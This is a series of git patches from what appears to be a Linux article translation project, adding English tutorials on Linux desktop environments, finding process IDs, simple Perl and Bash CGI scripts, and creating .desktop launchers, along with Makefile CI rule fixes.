7adc3ae9ed34a13dd3dfc9a9b3fd8dc18cab3d89 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 14:14:42 +0800 Subject: [PATCH 0720/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Migrating=20to?= =?UTF-8?q?=20Linux:=20Graphical=20Environments?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...rating to Linux- Graphical Environments.md | 108 ++++++++++++++++++ 1 file changed, 108 insertions(+) create mode 100644 sources/tech/20171219 Migrating to Linux- Graphical Environments.md diff --git a/sources/tech/20171219 Migrating to Linux- Graphical Environments.md b/sources/tech/20171219 Migrating to Linux- Graphical Environments.md new file mode 100644 index 0000000000..3f023e44fe --- /dev/null +++ b/sources/tech/20171219 Migrating to Linux- Graphical Environments.md @@ -0,0 +1,108 @@ +Migrating to Linux: Graphical Environments +====== +This is the third article in our series on migrating to Linux. If you missed earlier articles, they provided an [introduction to Linux for new users][1] and an [overview of Linux files and filesystems][2]. In this article, we'll discuss graphical environments. One of the advantages of Linux is that you have lots of choices, and you can select a graphical interface and customize it to work just the way you like it. + +Some of the popular graphical environments in Linux include: Cinnamon, Gnome, KDE Plasma, Xfce, and MATE, but there are many options. + +One thing that is often confusing to new Linux users is that, although specific Linux distributions have a default graphical environment, usually you can change the graphical interface at any time. This is different from what people are used to with Windows and Mac OS. The distribution and the graphical environment are separate things, and in many cases, they aren't tightly coupled together. Additionally, you can run applications built for one graphical environment inside other graphical environments. For example, an application built for the KDE Plasma graphical interface will typically run just fine in the Gnome desktop graphical environment. + +Some Linux graphical environments try to mimic Microsoft Windows or Apple's MacOS to a degree because that's what some people are familiar with, but other graphical interfaces are unique. + +Below, I'll cover several options showcasing different graphical environments running on different distributions. If you are unsure about which distribution to go with, I recommend starting with [Ubuntu][3]. Get the Long Term Support (LTS) version (which is 16.04.3 at the time of writing). Ubuntu is very stable and easy to use. + +### Transitioning from Mac + +The Elementary OS distribution provides a very Mac-like interface. It's default graphical environment is called Pantheon, and it makes transitioning from a Mac easy. It has a dock at the bottom of the screen and is designed to be extremely simple to use. In its aim to keep things simple, many of the default apps don't even have menus. Instead, there are buttons and controls on the title bar of the application (Figure 1). + + +![Elementary OS][5] + +Figure 1: Elementary OS with Pantheon. + +The Ubuntu distribution presents a default graphical interface that is also very Mac like. Ubuntu 17.04 or older uses the graphical environment called Unity, which by default places the dock on the left side of the screen and has a global menu bar area at the top that is shared across all applications. Note that newer versions of Ubuntu are switching to the Gnome environment. + +### Transitioning from Windows + +ChaletOS models its interface after Windows to help make migrating from Windows easier. ChaletOS used the graphical environment called Xfce (Figure 2). It has a home/start menu in the usual lower left corner of the screen with the search bar. There are desktop icons and notifications in the lower right corner. It looks so much like Windows that, at first glance, people may even assume you are running Windows. + +The Zorin OS distribution also tries to mimic Windows. Zorin OS uses the Gnome desktop modified to work like Windows' graphical interface. The start button is at the bottom left with the notification and indicator panel on the lower right. The start button brings up a Windows-like list of applications and a search bar to search. + +### Unique Environments + +One of the most commonly used graphical environments for Linux is the Gnome desktop (Figure 3). Many distributions use Gnome as the default graphical environment. Gnome by default doesn't try to be like Windows or MacOS but aims for elegance and ease of use in its own way. + +The Cinnamon environment was created mostly out of a negative reaction to the Gnome desktop environment when it changed drastically from version 2 to version 3. Although Cinnamon doesn't look like the older Gnome desktop version 2, it attempts to provide a simple interface, which functions somewhat similar to that of Windows XP. + +The graphical environment called MATE is modeled directly after Gnome version 2, which has a menu bar at the top of the screen for applications and settings, and it presents a panel at the bottom of the screen for running application tabs and other widgets. + +The KDE plasma environment is built around a widget interface where widgets can be installed on the desktop or in a panel (Figure 4). + +![KDE Plasma][8] + +Figure 4: Kubuntu with KDE Plasma. + +[Used with permission][6] + +No graphical environment is better than another. They're just different to suit different people's tastes. And again, if the options seem too much, start with [Ubuntu][3]. + +### Differences and Similarities + +Different operating systems do some things differently, which can make the transition challenging. For example, menus may appear in different places and settings may use different paths to access options. Here I list a few things that are similar and different in Linux to help ease the adjustment. + +### Mouse + +The mouse often works differently in Linux than it does in Windows and MacOS. In Windows and Mac, you double-click on most things to open them up. In Linux, many Linux graphical interfaces are set so that you single click on the item to open it. + +Also in Windows, you usually have to click on a window to make it the focused window. In Linux, many interfaces are set so that the focus window is the one under the mouse, even if it's not on top. The difference can be subtle, and sometimes the behavior is surprising. For example, in Windows if you have a background application (not the top window) and you move the mouse over it, without clicking, and scroll the mouse wheel, the top application window will scroll. In Linux, the background window (the one with the mouse over it) will scroll instead. + +### Menus + +Application menus are a staple of computer programs and recently there seems to be a movement to move the menus out of the way or to remove them altogether. So when migrating to Linux, you may not find menus where you expect. The application menu might be in a global shared menu bar like on MacOS. The menu might be below a "more options" icon, similar to those in many mobile applications. Or, the menu may be removed altogether in exchange for buttons, as with some of the apps in the Pantheon environment in Elementary OS. + +### Workspaces + +Many Linux graphical environments present multiple workspaces. A workspace fills your entire screen and contains windows of some running applications. Switching to a different workspace will change which applications are visible. The concept is to group the open applications used for one project together on one workspace and those for another project on a different workspace. + +Not everyone needs or even likes workspaces, but I mention these because sometimes, as a newcomer, you might accidentally switch workspaces with a key combination, and go, "Hey! where'd my applications go?" If all you see is the desktop wallpaper image where you expected to see your apps, chances are you've just switched workspaces, and your programs are still running in a workspace that is now not visible. In many Linux environments, you can switch workspaces by pressing Alt-Ctrl and then an arrow (up, down. left or right). Hopefully, you'll see your programs still there in another workspace. + +Of course, if you happen to like workspaces (many people do), then you have found a useful default feature in Linux. + +### Settings + +Many Linux graphical environments also have some type of settings program or settings panel that let you configure settings on the machine. Note that similarly to Windows and MacOS, things in Linux can be configured in fine detail, and not all of these detailed settings can be found in the settings program. These settings, though, should be enough for most of the things you'll need to set on a typical desktop system, such as selecting the desktop wallpaper, changing how long before the screen goes blank, and connecting to printers, to name a few. + +The settings presented in the application will usually not be grouped the same way or named the same way they are on Windows or MacOS. Even different graphical interfaces in Linux can present settings differently, which may take time to adjust to. Online search, of course, is a great place to search for answers on how to configure things in your graphical environment. + +### Applications + +Finally, applications in Linux might be different. You will likely find some familiar applications but others may be completely new to you. For example, you can find Firefox, Chrome, and Skype on Linux. If you can't find a specific app, there's usually an alternative program you can use. If not, you can run many Windows applications in a compatibility layer called WINE. + +On many Linux graphical environments, you can bring up the applications menu by pressing the Windows Logo key on the keyboard. In others, you need to click on a start/home button or click on an applications menu. In many of the graphical environments, you can search for an application by category rather than by its specific name. For example, if you want to use an editor program but you don't know what it's called, you can bring up the application menu and enter "editor" in the search bar, and it will show you one or more applications that are considered editors. + +To get you started, here is a short list of a few applications and potential Linux alternatives. + +[linux][10] + +Note that this list is by no means comprehensive; Linux offers a multitude of options to meet your needs. + +Learn more about Linux through the free ["Introduction to Linux" ][9]course from The Linux Foundation and edX. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/learn/2017/12/migrating-linux-graphical-environments + +作者:[John Bonesio][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/johnbonesio +[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction +[2]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems +[3]:https://www.evernote.com/OutboundRedirect.action?dest=https%3A%2F%2Fwww.ubuntu.com%2Fdownload%2Fdesktop +[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.png?itok=kJk2-BsL (Elementary OS) +[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/kubuntu.png?itok=a2E7ttaa (KDE Plasma) +[9]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux + +[10]: https://www.linux.com/sites/lcom/files/styles/rendered_file/public/linux-options.png?itok=lkqD1UMj From 22de9e9014efbb4b62dde4402b18ca27439d323c Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 14:34:35 +0800 Subject: [PATCH 0721/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=204=20Easiest=20W?= =?UTF-8?q?ays=20To=20Find=20Out=20Process=20ID=20(PID)=20In=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...s To Find Out Process ID (PID) In Linux.md | 105 ++++++++++++++++++ 1 file changed, 105 insertions(+) create mode 100644 sources/tech/20171219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md diff --git a/sources/tech/20171219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md b/sources/tech/20171219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md new file mode 100644 index 0000000000..75ec42c268 --- /dev/null +++ b/sources/tech/20171219 4 Easiest Ways To Find Out Process ID (PID) In Linux.md @@ -0,0 +1,105 @@ +4 Easiest Ways To Find Out Process ID (PID) In Linux +====== +Everybody knows about PID, Exactly what is PID? Why you want PID? What are you going to do using PID? Are you having the same questions on your mind? If so, you are in the right place to get all the details. + +Mainly, we are looking PID to kill an unresponsive program and it's similar to Windows task manager. Linux GUI also offering the same feature but CLI is an efficient way to perform the kill operation. + +### What Is Process ID? + +PID stands for process identification number which is generally used by most operating system kernels such as Linux, Unix, macOS and Windows. It is a unique identification number that is automatically assigned to each process when it is created in an operating system. A process is a running instance of a program. + +**Suggested Read :** [How To Check Apache Web Server Uptime In Linux][1] + +Each time process ID will be getting change to all the processes except init because init is always the first process on the system and is the ancestor of all other processes. It's PID is 1. + +The default maximum value of PIDs is `32,768`. The same has been verified by running the following command on your system `cat /proc/sys/kernel/pid_max`. On 32-bit systems 32768 is the maximum value but we can set to any value up to 2^22 (approximately 4 million) on 64-bit systems. + +You may ask, why we need such amount of PIDs? because we can't reused the PIDs immediately that's why. Also in order to prevent possible errors. + +The PIDs for the running processes on the system can be found by using the pidof command, pgrep command, ps command, and pstree command. + +### Method-1 : Using pidof Command + +pidof used to find the process ID of a running program. It's prints those id's on the standard output. To demonstrate this, we are going to find out the Apache2 process id from Debian 9 (stretch) system. +``` +# pidof apache2 +3754 2594 2365 2364 2363 2362 2361 + +``` + +From the above output you may face difficulties to identify the Process ID because it's shows all the PIDs (included Parent and Childs) aginst the process name. Hence we need to find out the parent PID (PPID), which is the one we are looking. It could be the first number. In my case it's `3754` and it's shorted in descending order. + +### Method-2 : Using pgrep Command + +pgrep looks through the currently running processes and lists the process IDs which match the selection criteria to stdout. +``` +# pgrep apache2 +2361 +2362 +2363 +2364 +2365 +2594 +3754 + +``` + +This also similar to the above output but it's shorting the results in ascending order, which clearly says that the parent PID is the last one. In my case it's `3754`. + +**Note :** If you have more than one process id of the process, you may face trouble to identify the parent process id when using pidof & pgrep command. + +### Method-3 : Using pstree Command + +pstree shows running processes as a tree. The tree is rooted at either pid or init if pid is omitted. If a user name is specified in the pstree command then it's shows all the process owned by the corresponding user. + +pstree visually merges identical branches by putting them in square brackets and prefixing them with the repetition count. +``` +# pstree -p | grep "apache2" + |- apache2(3754) -|-apache2(2361) + | |-apache2(2362) + | |-apache2(2363) + | |-apache2(2364) + | |-apache2(2365) + | `-apache2(2594) + +``` + +To get parent process alone, use the following format. +``` +# pstree -p | grep "apache2" | head -1 + |- apache2(3754) -|-apache2(2361) + +``` + +pstree command is very simple because it's segregating the Parent and Child processes separately but it's not easy when using pidof & pgrep command. + +### Method-4 : Using ps Command + +ps displays information about a selection of the active processes. It displays the process ID (pid=PID), the terminal associated with the process (tname=TTY), the cumulated CPU time in [DD-]hh:mm:ss format (time=TIME), and the executable name (ucmd=CMD). Output is unsorted by default. +``` +# ps aux | grep "apache2" +www-data 2361 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start +www-data 2362 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start +www-data 2363 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start +www-data 2364 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start +www-data 2365 0.0 0.4 302652 8400 ? S 06:25 0:00 /usr/sbin/apache2 -k start +www-data 2594 0.0 0.4 302652 8400 ? S 06:55 0:00 /usr/sbin/apache2 -k start +root 3754 0.0 1.4 302580 29324 ? Ss Dec11 0:23 /usr/sbin/apache2 -k start +root 5648 0.0 0.0 12784 940 pts/0 S+ 21:32 0:00 grep apache2 + +``` + +From the above output we can easily identify the parent process id (PPID) based on the process start date. In my case apache2 process was started @ `Dec11` which is the parent and others are child's. PID of apache2 is `3754`. + +-------------------------------------------------------------------------------- + +via: https://www.2daygeek.com/how-to-check-find-the-process-id-pid-ppid-of-a-running-program-in-linux/ + +作者:[Magesh Maruthamuthu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.2daygeek.com/author/magesh/ +[1]:https://www.2daygeek.com/check-find-apache-httpd-web-server-uptime-linux/ From 77ad53772dd3400f95c812ec28f02f60df6e493f Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 14:41:33 +0800 Subject: [PATCH 0722/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20gene?= =?UTF-8?q?rate=20webpages=20using=20CGI=20scripts?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... to generate webpages using CGI scripts.md | 129 ++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 sources/tech/20171219 How to generate webpages using CGI scripts.md diff --git a/sources/tech/20171219 How to generate webpages using CGI scripts.md b/sources/tech/20171219 How to generate webpages using CGI scripts.md new file mode 100644 index 0000000000..b452cdee84 --- /dev/null +++ b/sources/tech/20171219 How to generate webpages using CGI scripts.md @@ -0,0 +1,129 @@ +How to generate webpages using CGI scripts +====== +Back in the stone age of the Internet when I first created my first business website, life was good. + +I installed Apache and created a few simple HTML pages that stated a few important things about my business and gave important information like an overview of my product and how to contact me. It was a static website because the content seldom changed. Maintenance was simple because of the unchanging nature of my site. + +## Static content + +Static content is easy and still common. Let's take a quick look at a couple sample static web pages. You don't need a working website to perform these little experiments. Just place the files in your home directory and open them with your browser. You will see exactly what you would if the file were served to your browser via a web server. + +The first thing you need on a static website is the index.html file which is usually located in the /var/www/html directory. This file can be as simple as a text phrase such as "Hello world" without any HTML markup at all. This would simply display the text string. Create index.html in your home directory and add "Hello world" (without the quotes) as it's only content. Open the index.html in your browser with the following URL. +``` +file:///home//index.html +``` + +So HTML is not required, but if you had a large amount of text that needed formatting, the results of a web page with no HTML coding would be incomprehensible with everything running together. + +So the next step is to make the content more readable by using a bit of HTML coding to provide some formatting. The following command creates a page with the absolute minimum markup required for a static web page with HTML. You could also use your favorite editor to create the content. +``` +echo "

Hello World

" > test1.html +``` + +Now view index.html and see the difference. + +Of course you can put a lot of additional HTML around the actual content line to make a more complete and standard web page. That more complete version as shown below will still display the same results in the browser, but it also forms the basis for more standardized web site. Go ahead and use this content for your index.html file and display it in your browser. +``` + + + +My Web Page + + +

Hello World

+ + +``` + +I built a couple static websites using these techniques, but my life was about to change. + +## Dynamic web pages for a new job + +I took a new job in which my primary task was to create and maintain the CGI ([Common Gateway Interface][6]) code for a very dynamic website. In this context, dynamic means that the HTML needed to produce the web page on a browser was generated from data that could be different every time the page was accessed. This includes input from the user on a web form that is used to look up data in a database. The resulting data is surrounded by appropriate HTML and displayed on the requesting browser. But it does not need to be that complex. + +Using CGI scripts for a website allows you to create simple or complex interactive programs that can be run to provide a dynamic web page that can change based on input, calculations, current conditions in the server, and so on. There are many languages that can be used for CGI scripts. We will look at two of them, Perl and Bash. Other popular CGI languages include PHP and Python. + +This article does not cover installation and setup of Apache or any other web server. If you have access to a web server that you can experiment with, you can directly view the results as they would appear in a browser. Otherwise, you can still run the programs from the command line and view the HTML that would be created. You can also redirect that HTML output to a file and then display the resulting file in your browser. + +### Using Perl + +Perl is a very popular language for CGI scripts. Its strength is that it is a very powerful language for the manipulation of text. + +To get CGI scripts to execute, you need the following line in the in httpd.conf for the website you are using. This tells the web server where your executable CGI files are located. For this experiment, let's not worry about that. +``` +ScriptAlias /cgi-bin/ "/var/www/cgi-bin/" +``` + +Add the following Perl code to the file index.cgi, which should be located in your home directory for your experimentation. Set the ownership of the file to apache.apache when you use a web server, and set the permissions to 755 because it must be executable no matter where it is located. + +``` +#!/usr/bin/perl +print "Content-type: text/html\n\n"; +print "\n"; +print "

Hello World

\n"; +print "Using Perl

\n"; +print "\n"; +``` + +Run this program from the command line and view the results. It should display the HTML code it will generate. + +Now view the index.cgi in your browser. Well, all you get is the contents of the file. Browsers really need to have this delivered as CGI content. Apache does not really know that it needs to run the file as a CGI program unless the Apache configuration for the web site includes the "ScriptAlias" definition as shown above. Without that bit of configuration Apache simply send the data in the file to the browser. If you have access to a web server, you could try this out with your executable index files in the /var/www/cgi-bin directory. + +To see what this would look like in your browser, run the program again and redirect the output to a new file. Name it whatever you want. Then use your browser to view the file that contains the generated content. + +The above CGI program is still generating static content because it always displays the same output. Add the following line to your CGI program immediately after the "Hello World" line. The Perl "system" command executes the commands following it in a system shell, and returns the result to the program. In this case, we simply grep the current RAM usage out of the results from the free command. + +``` +system "free | grep Mem\n"; +``` + +Now run the program again and redirect the output to the results file. Reload the file in the browser. You should see an additional line so that displays the system memory statistics. Run the program and refresh the browser a couple more times and notice that the memory usage should change occasionally. + +### Using Bash + +Bash is probably the simplest language of all for use in CGI scripts. Its primary strength for CGI programming is that it has direct access to all of the standard GNU utilities and system programs. + +Rename the existing index.cgi to Perl.index.cgi and create a new index.cgi with the following content. Remember to set the permissions correctly to executable. + +``` +#!/bin/bash +echo "Content-type: text/html" +echo "" +echo '' +echo '' +echo '' +echo 'Hello World' +echo '' +echo '' +echo '

Hello World

' +echo 'Using Bash

' +free | grep Mem +echo '' +echo '' +exit 0 +``` + +Execute this program from the command line and view the output, then run it and redirect the output to the temporary results file you created before. Then refresh the browser to view what it looks like displayed as a web page. + +## Conclusion + +It is actually very simple to create CGI programs that can be used to generate a wide range of dynamic web pages. This is a trivial example but you should now see some of the possibilities. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/cgi-scripts + +作者:[David Both][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth +[1]:http://december.com/html/4/element/html.html +[2]:http://december.com/html/4/element/head.html +[3]:http://december.com/html/4/element/title.html +[4]:http://december.com/html/4/element/body.html +[5]:http://december.com/html/4/element/h1.html +[6]:https://en.wikipedia.org/wiki/Common_Gateway_Interface +[7]:http://perldoc.perl.org/functions/system.html From c1faf93c45a12429ab22f0a52e70d54942747230 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 14:46:23 +0800 Subject: [PATCH 0723/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Crea?= =?UTF-8?q?te=20a=20.Desktop=20File=20For=20Your=20Application=20in=20Linu?= =?UTF-8?q?x?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ktop File For Your Application in Linux.md | 90 +++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 sources/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md diff --git a/sources/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md b/sources/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md new file mode 100644 index 0000000000..79f6687b97 --- /dev/null +++ b/sources/tech/20171218 How to Create a .Desktop File For Your Application in Linux.md @@ -0,0 +1,90 @@ +translating by lujun9972 +How to Create a .Desktop File For Your Application in Linux +====== +A .desktop file is simply a shortcut that is used to launch application in Linux. Without the .desktop file, your application won't show up in the Applications menu and you can't launch it with third-party launchers such as Synapse and Albert. + +Most applications, when installed, will create the .desktop file automatically and place themselves in the Application menu for quick access. However, if you compile a program from source or download an app in archive format, this may not be the case and you may have to open the terminal to execute the binary every time you want to use it. Obviously, this can become a very tedious and troublesome step. + +This article will describe how you can create a .desktop file for any application you use that you can launch from the Application menu. + + **Related** : [How to Add App Drawers to Unity Launcher in Ubuntu][1] + +### How to create Desktop launchers +A ".desktop" file is basically a simple text file that holds information about a program. It is usually placed in "~/.local/share/applications" or "/usr/share/applications/" depending whether you want the launcher to be accessible only for local account or for everyone. If you navigate to either directory in your File manager, you will see quite a few ".desktop" files that correspond to the installed apps on your computer. + +For demonstration purposes, I will create a .desktop file for Super Tux Kart, a kart racing game which I like to play sometimes. A version is available in the Ubuntu repos, but this is often behind the latest stable version. + +The only way to get the latest and greatest release is by downloading a tar archive, extracting it and executing a file which will launch the game. + +You can follow along with whatever program you want to create a launcher for and it should work the same way. + + **Note** : The following steps assume you have the archive for the program you want to create a launcher for in your "Downloads" folder. + +1\. Navigate to the directory where the archive is stored, right-click it and select "Extract here". + +![application-launcher-5][2] + +2\. Once the extraction is complete, Change to the newly created folder and find the executable. One you find it, right-click it click "Run" to launch the program, just to make sure it is working. + +![application-launcher-6][3] + +3\. In some cases, you won't see the "Run" option in the menu. This is often because the executable is a text file. You can get around this by executing it via the terminal or, if you use GNOME, click the Files menu in the top bar, and select "Preferences". + +![application-launcher-linux-1][4] + +4\. Select the "Behavior" tab and choose the "Run them" option under "Executable Text Files". Now the "Run" option should appear when you right-click the executable text file. + +![application-launcher-31][5] + +5\. If you've confirmed that the application works when you launch it, you can exit it. Then launch your text editor and paste the following into the empty text file: +``` +[Desktop Entry] +Encoding=UTF-8 +Version=1.0 +Type=Application +Terminal=false +Exec=/path/to/executable +Name=Name of Application +Icon=/path/to/icon +``` + +You need to change the "Exec" field to the path to the executable and "Name" field to the name of the application. Most programs would provide an icon somewhere in the archive so don't forget to include that as well. In my case, the launcher file for Super Tux Kart looks like this: + +![application-launcher-supertuxkart][6] + +6\. Save the file in "~/.local/share/applications" folder as "application-name.desktop". The ".local" folder is a hidden folder in your Home directory and you will have enable "Show Hidden Files" mode to view it. If you want it to be globally accessible, run the following command in the terminal: +``` +sudo mv ~/.local/share/applications/ /usr/share/applications/ +``` + +Of course, don't forget to change the to the actual name of the .desktop file. + +7\. Once done, just open the Applications menu on your desktop, and the application will be right there to use. + +![application-launcher-2][7] + +The method described here should work on all mainstream Linux based operating systems. Here's another screenshot showing Super Tux Kart in elementary OS's application launcher (slingshot) + +![application-launcher-4][8] + +Feel free to leave a comment below if you found this tutorial helpful. + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/create-desktop-file-linux/ + +作者:[Ayo Isaiah][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/ayoisaiah/ +[1]:https://www.maketecheasier.com/add-app-drawer-unity-launcher-ubuntu/ (How to Add App Drawers to Unity Launcher in Ubuntu) +[2]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-5.png (application-launcher-5) +[3]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-6.png (application-launcher-6) +[4]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-linux-1.png (application-launcher-linux-1) +[5]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-31.png (application-launcher-31) +[6]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-supertuxkart.png (application-launcher-supertuxkart) +[7]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-2.jpg (application-launcher-2) +[8]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-4.jpg (application-launcher-4) From 4c18c274e6192f748d185bee3aee4b616b0a978f Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 20 Dec 2017 15:55:05 +0800 Subject: [PATCH 0724/1627] =?UTF-8?q?CI=20=E8=A7=84=E5=88=99=E3=80=82?= =?UTF-8?q?=E3=80=82=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 75b747a90f..8b36b6637b 100644 --- a/Makefile +++ b/Makefile @@ -19,7 +19,7 @@ $(CHANGE_FILE): rule-source-added: [ $(shell grep '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] - [ $(shell grep -v '^A\s\+sources/(news|talk|tech)/\d{6} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] + [ $(shell grep -v '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] echo 'Rule Matched: $(@)' rule-translation-requested: From 897a029b5e4201c42008f4699004ba0c84af522d Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 20 Dec 2017 16:04:21 +0800 Subject: [PATCH 0725/1627] =?UTF-8?q?=E6=9B=B4=E6=96=B0=20CI=20=E8=A7=84?= =?UTF-8?q?=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Makefile | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Makefile b/Makefile index 8b36b6637b..f9afa44a97 100644 --- a/Makefile +++ b/Makefile @@ -18,8 +18,8 @@ $(CHANGE_FILE): git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ rule-source-added: - [ $(shell grep '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] - [ $(shell grep -v '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_-.,\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] + [ $(shell grep '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] + [ $(shell grep -v '^A\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] echo 'Rule Matched: $(@)' rule-translation-requested: @@ -28,7 +28,7 @@ rule-translation-requested: echo 'Rule Matched: $(@)' rule-translation-completed: - [ $(shell grep '^D\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s\+sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell grep '^A\s\+translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' @@ -40,6 +40,6 @@ rule-translation-revised: rule-translation-published: [ $(shell grep '^D\s\+translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell grep '^A\s\+published/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s\+published/\d{8} [a-zA-Z0-9_.,\-\(\)\[\] ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' From a3aac9ae972ed3f07085ecd8ff60f24911665738 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 17:19:45 +0800 Subject: [PATCH 0726/1627] =?UTF-8?q?translate=20'20171214=20A=20step-by-s?= =?UTF-8?q?tep=20guide=20to=20building=20open=20culture.md'=20done=20at=20?= =?UTF-8?q?2017=E5=B9=B4=2012=E6=9C=88=2020=E6=97=A5=20=E6=98=9F=E6=9C=9F?= =?UTF-8?q?=E4=B8=89=2017:19:45=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...-by-step guide to building open culture.md | 46 ------------------- ...-by-step guide to building open culture.md | 43 +++++++++++++++++ 2 files changed, 43 insertions(+), 46 deletions(-) delete mode 100644 sources/tech/20171214 A step-by-step guide to building open culture.md create mode 100644 translated/tech/20171214 A step-by-step guide to building open culture.md diff --git a/sources/tech/20171214 A step-by-step guide to building open culture.md b/sources/tech/20171214 A step-by-step guide to building open culture.md deleted file mode 100644 index b5b0ef3998..0000000000 --- a/sources/tech/20171214 A step-by-step guide to building open culture.md +++ /dev/null @@ -1,46 +0,0 @@ -translating by lujun9972 -A step-by-step guide to building open culture -====== -When we published The Open Organization in 2015, it ignited a spark of curiosity among companies of all shapes and sizes about what having an "open" culture really means. Even when I have the opportunity to talk to other companies about the benefits of working with our products and services, it doesn't take long for the topic of conversation to shift from technology to people and culture. It's on the mind of just about everyone interested in driving innovation and maintaining competitive advantage in their industries. - -Senior leadership teams aren't the only ones interested in working openly. The results of [a recent Red Hat survey][1] found 